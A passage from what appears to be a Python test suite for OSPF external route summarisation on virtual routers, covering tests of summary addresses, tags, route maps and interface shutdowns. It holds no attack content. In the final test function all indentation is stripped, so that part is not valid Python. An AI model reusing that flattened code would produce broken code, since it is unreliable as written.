    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Configure metric type as 1 in route map.")
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [{"action": "permit", "set": {"metric-type": "type-1"}}]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes(static / connected) are summarised"
        " to configured summary address with metric type 2."
    )
    # NOTE(review): the expectation stays E2 even after the route map sets
    # type-1 on the contributing routes — presumably the summary LSA keeps
    # its own metric type; confirm against ospfd behaviour.
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Un configure metric type from route map.")
    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "set": {"metric-type": "type-1"},
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes(static / connected) are summarised"
        " to configured summary address with metric type 2."
    )
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Change rule from permit to deny in prefix list.")
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": "any", "action": "deny"}
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    write_test_footer(tc_name)
def test_ospf_type5_summary_tc42_p0(request):
    """OSPF summarisation functionality.

    Exercises external route summarisation end to end on R0/R1:
      * configure a summary-address with an aggregate timer and verify only
        the summary reaches R1;
      * delete and re-add the summary and the contributing static routes;
      * summarise redistributed connected routes;
      * shut / no-shut an interface;
      * delete and re-create the OSPF process;
      * remove redistribution and verify the summary is withdrawn;
      * finally re-add the summary with an explicit metric.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()

    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)

    global topo
    step("Bring up the base config as per the topology")
    reset_config_on_routers(tgen)

    protocol = "ospf"

    step(
        "Configure 5 static routes from the same network on R0"
        "5 static routes from different networks and redistribute in R0"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    dut = "r0"
    red_static(dut)

    step("Verify that routes are learnt on R1.")
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step(
        "Configure External Route summary in R0 to summarise 5"
        " routes to one route. with aggregate timer as 6 sec"
    )
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ],
                "aggr_timer": 6,
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 after 5 secs of delay timer expiry and only one "
        "route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Verify that originally advertised routes are withdraw from there" " peer.")
    input_dict = {
        "r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
    }
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )

    result = verify_rib(
        tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step("Delete the configured summary")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "8",
                        "del_aggr_timer": True,
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )

    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Summary Route still present in RIB".format(
        tc_name
    )

    step("show ip ospf summary should not have any summary address.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Summary still present in DB".format(tc_name)

    dut = "r1"
    step("All 5 routes are advertised after deletion of configured summary.")

    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("configure the summary again and delete static routes .")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    input_dict = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole", "delete": True}
            ]
        }
    }
    result = create_static_routes(tgen, input_dict)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    step("Verify that summary route is withdrawn from R1.")

    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )

    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step("Add back static routes.")
    input_dict_static_rtes = {
        "r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary"
        " address on R0 and only one route is sent to R1."
    )
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )

    result = verify_rib(
        tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show configure summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Configure new static route which is matching configured summary.")
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [{"network": NETWORK_11["ipv4"], "next_hop": "blackhole"}]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # step("verify that summary lsa is not refreshed.")
    # show ip ospf database command is not working, waiting for DEV fix.

    step("Delete one of the static route.")
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK_11["ipv4"], "next_hop": "blackhole", "delete": True}
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # step("verify that summary lsa is not refreshed.")
    # show ip ospf database command is not working, waiting for DEV fix.

    # step("Verify that deleted static route is removed from ospf LSDB.")
    # show ip ospf database command is not working, waiting for DEV fix.

    step(
        "Configure redistribute connected and configure ospf external"
        " summary address to summarise the connected routes."
    )
    dut = "r0"
    red_connected(dut)
    clear_ospf(tgen, dut)

    ip = topo["routers"]["r0"]["links"]["r3"]["ipv4"]
    ip_net = str(ipaddress.ip_interface(u"{}".format(ip)).network)
    ospf_summ_r1 = {
        "r0": {
            "ospf": {"summary-address": [{"prefix": ip_net.split("/")[0], "mask": "8"}]}
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured "
        "summary address on R0 and only one route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "10.0.0.0/8"}]}}
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Shut one of the interface")
    # NOTE(review): dut is still "r1" here while intf is taken from r0's
    # links - confirm the intended router for the shutdown.
    intf = topo["routers"]["r0"]["links"]["r3-link0"]["interface"]
    shutdown_bringup_interface(tgen, dut, intf, False)

    # step("verify that summary lsa is not refreshed.")
    # show ip ospf database command is not working, waiting for DEV fix.

    # step("Verify that deleted connected route is removed from ospf LSDB.")
    # show ip ospf database command is not working, waiting for DEV fix.

    step("Un do shut the interface")
    shutdown_bringup_interface(tgen, dut, intf, True)

    # step("verify that summary lsa is not refreshed.")
    # show ip ospf database command is not working, waiting for DEV fix.

    # step("Verify that deleted connected route is removed from ospf LSDB.")
    # show ip ospf database command is not working, waiting for DEV fix.

    step("Delete OSPF process.")
    ospf_del = {"r0": {"ospf": {"delete": True}}}
    result = create_router_ospf(tgen, topo, ospf_del)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Reconfigure ospf process with summary")
    reset_config_on_routers(tgen)

    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    dut = "r0"
    red_static(dut)
    red_connected(dut)
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 and only one route is sent to R1."
    )
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    # Re-apply the identical summary config; this must be a no-op.
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # step("verify that summary lsa is not refreshed.")
    # show ip ospf database command is not working, waiting for DEV fix.

    step("Delete the redistribute command in ospf.")
    dut = "r0"
    red_connected(dut, config=False)
    red_static(dut, config=False)

    step("Verify that summary route is withdrawn from the peer.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )

    result = verify_rib(
        tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "8",
                        "metric": "1234",
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    write_test_footer(tc_name)
def test_ospf_type5_summary_tc45_p0(request):
"""OSPF summarisation with Tag option"""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
step("Configure OSPF on all the routers of the topology.")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": "1234",
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and only one route is sent to R1 with configured tag."
)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1234"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": "1234",
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary Route still present in RIB".format(
tc_name
)
step("show ip ospf summary should not have any summary address.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary still present in DB".format(tc_name)
step("Configure Min tag value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8", "tag": 1}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Configure Max Tag Value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "4294967295"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 4294967295,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("configure new static route with different tag.")
input_dict_static_rtes_11 = {
"r0": {
"static_routes": [
{"network": NETWORK_11["ipv4"], "next_hop": "blackhole", "tag": "88888"}
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes_11)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("New tag has not been used by summary address.")
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "88888"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, tag="88888", expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen,
"ipv4",
dut,
input_dict_summary,
protocol=protocol,
tag="88888",
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 88888,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary address")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that 6 routes are advertised to neighbour with 5 routes"
" without any tag, 1 route with tag."
)
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that summary address is flushed from neighbor.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Configure summary first & then configure matching static route.")
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole", "delete": True},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole", "delete": True},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Repeat steps 1 to 10 of summarisation in non Back bone area.")
reset_config_on_routers(tgen)
step("Change the area id on the interface on R0")
input_dict = {
"r0": {
"links": {
"r1": {
"interface": topo["routers"]["r0"]["links"]["r1"]["interface"],
"ospf": {"area": "0.0.0.0"},
"delete": True,
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
input_dict = {
"r0": {
"links": {
"r1": {
"interface": topo["routers"]["r0"]["links"]["r1"]["interface"],
"ospf": {"area": "0.0.0.1"},
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
step("Change the area id on the interface ")
input_dict = {
"r1": {
"links": {
"r0": {
"interface": topo["routers"]["r1"]["links"]["r0"]["interface"],
"ospf": {"area": "0.0.0.0"},
"delete": True,
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
input_dict = {
"r1": {
"links": {
"r0": {
"interface": topo["routers"]["r1"]["links"]["r0"]["interface"],
"ospf": {"area": "0.0.0.1"},
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
ospf_covergence = verify_ospf_neighbor(tgen, topo)
assert ospf_covergence is True, "setup_module :Failed \n Error:" " {}".format(
ospf_covergence
)
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": "1234",
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and only one route is sent to R1 with configured tag."
)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1234"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Delete the configured summary")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
